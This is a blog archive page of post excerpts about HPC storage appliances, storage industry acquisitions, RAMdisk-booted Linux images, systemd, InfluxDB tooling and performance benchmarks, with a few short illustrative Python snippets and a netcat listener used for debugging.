Category: appliances
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about through Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of their earlier acquisition of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linked programs to more modular dynamic linking. The thinking was that it would save precious memory, by not having many copies of libc statically linked into binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. It replaces 20-ish year old init style processing with a more legitimate control plane, and a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient who, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And is more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “let’s just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Nutanix files for IPO
Short story here. I am not going to pore over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
    ----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
    usr sys idl wai hiq siq| read writ| recv send| in out | int csw
    0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k
    4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721
    0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352
    0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613
    0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413
    0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334
    0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306
    0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483
    0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377
    8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k
    9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k
    10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k
    12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k
    11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k
    11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k

Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
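To put that iperf number in context, here is a rough back-of-the-envelope sketch. It assumes the 20GB/s figure is the sum of both directions on a single 100Gb link and ignores protocol overhead entirely; the function name `line_rate_gbytes` is made up for illustration.

```python
def line_rate_gbytes(gbits_per_s: float, bidirectional: bool = False) -> float:
    """Convert a link speed in Gb/s to a theoretical GB/s ceiling.

    Assumption: 8 bits per byte, no framing or protocol overhead.
    """
    gbytes = gbits_per_s / 8
    return gbytes * 2 if bidirectional else gbytes


# Theoretical ceiling for a 100Gb link driven in both directions at once.
peak = line_rate_gbytes(100, bidirectional=True)

# Fraction of that ceiling reached by the observed 20GB/s.
fraction = 20 / peak

print(f"peak {peak} GB/s, observed 20 GB/s is {fraction:.0%} of it")
```

Under those assumptions the observed rate is a large fraction of what the wire can carry in both directions.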
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliott Management (e.g. they wanted more return on their investment). As part of increasing the return of value to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. It’s been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:

    root@usn-ramboot:~# df -h
    Filesystem Size Used Avail Use% Mounted on
    tmpfs 8.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple:

    sudo make INSTALLPATH=/path/where/you/want/it

It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:

* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldy … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, it’s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
    nc -k -l a.b.c.d 10000

Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
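A minimal sketch of why one newline can matter so much, assuming the receiver speaks a line-oriented plaintext protocol of the kind Graphite's carbon listener accepts (`path value timestamp`, one record per line). The helper names, metric path, and host below are made up for illustration; this is not the monitoring code from the post.

```python
import socket
import time


def format_metric(path: str, value: float, timestamp: int) -> bytes:
    """Build one plaintext metric record.

    The trailing newline is the record terminator: a line-oriented
    receiver keeps buffering until it sees one.
    """
    return f"{path} {value} {timestamp}\n".encode("ascii")


def send_metric(host: str, port: int, path: str, value: float) -> None:
    """Open a TCP connection and send a single newline-terminated record."""
    record = format_metric(path, value, int(time.time()))
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(record)


# Hypothetical usage against the nc listener shown above:
# send_metric("a.b.c.d", 10000, "unison.node1.load", 0.5)
```

Pointing a sender like this at an `nc` listener makes a missing terminator easy to spot, because successive records run together on one line.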
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. It doesn’t show the formatting of the output quite right. Will try to fix over the weekend, as I move this to a far more feature complete bit.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based), and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. What’s coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Category: big-data
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook are releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
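For readers who have not met it, the BLAS-style GEMM operation computes `C = alpha * A @ B + beta * C`. The block below is a plain Python sketch of that definition on lists of lists, purely to show what is being computed. It is not the Facebook implementation, it does nothing with reduced precision, and it has none of the blocking or vectorization that makes tuned libraries fast.

```python
def gemm(alpha, a, b, beta, c):
    """Return alpha * (a @ b) + beta * c for row-major lists of lists.

    a is m x k, b is k x n, c is m x n. A naive triple loop, for illustration only.
    """
    m, k, n = len(a), len(b), len(b[0])
    if any(len(row) != k for row in a):
        raise ValueError("inner dimensions of a and b do not match")
    if len(c) != m or any(len(row) != n for row in c):
        raise ValueError("c must be m x n")
    return [
        [
            alpha * sum(a[i][p] * b[p][j] for p in range(k)) + beta * c[i][j]
            for j in range(n)
        ]
        for i in range(m)
    ]


a = [[1, 2], [3, 4]]
b = [[5, 6], [7, 8]]
c = [[1, 1], [1, 1]]
result = gemm(2, a, b, 3, c)
print(result)
```

Setting `alpha=1` and `beta=0` reduces this to an ordinary matrix multiply, which is why GEMM is described as the generalized form.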
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
Interesting post on mixed integer programming for diets ... that has some hilarious output
I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, … there’s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing … and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
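The core idea behind a parallel downloader can be sketched as splitting a file of known size into byte ranges and fetching each range on its own connection with an HTTP `Range` header. The sketch below only computes the ranges; it is an illustration of the general technique under that assumption, not a description of how aria2c schedules its segments, and the function names are made up.

```python
def split_ranges(size: int, parts: int) -> list[tuple[int, int]]:
    """Split `size` bytes into up to `parts` contiguous, inclusive (start, end) ranges."""
    if size < 0 or parts < 1:
        raise ValueError("size must be >= 0 and parts >= 1")
    parts = min(parts, size)  # never create empty ranges
    if parts == 0:
        return []
    base, extra = divmod(size, parts)
    ranges = []
    start = 0
    for i in range(parts):
        # The first `extra` ranges each take one leftover byte.
        length = base + (1 if i < extra else 0)
        ranges.append((start, start + length - 1))
        start += length
    return ranges


def range_header(start: int, end: int) -> str:
    """Format the value of an HTTP Range header for one inclusive byte range."""
    return f"bytes={start}-{end}"


for start, end in split_ranges(10, 3):
    print(range_header(start, end))
```

Each range can then be requested concurrently and written at its own offset in the output file.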
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Finally got to use MCE::* in a project
There is a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about as a result of Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of their earlier acquisition of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linking programs to more modular dynamic linking. The thought process was that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
#Perl on the rise for #DevOps
Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is by and large, my current go-to language. I’ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python … they build (actually very good) tools.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box
Color me impressed … Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -> 6 x 10^4 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.
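The bandwidth wall arithmetic is easy to check with a few lines of Python. This is only a sketch using the capacities and bandwidths quoted in the text, and it assumes decimal units (1 TB = 1000 GB). The function name `drain_seconds` is made up for illustration.

```python
def drain_seconds(capacity_tb: float, bandwidth_gb_per_s: float) -> float:
    """Time in seconds to fill or empty a device at a sustained bandwidth."""
    return capacity_tb * 1000.0 / bandwidth_gb_per_s  # TB -> GB, decimal units assumed


single_drive = drain_seconds(60, 1)     # one 60TB drive at 1 GB/s
full_box = drain_seconds(3600, 50)      # one 60 bay box (3600TB) at 50 GB/s

print(f"single drive: {single_drive:.0f} s ({single_drive / 3600:.1f} hours)")
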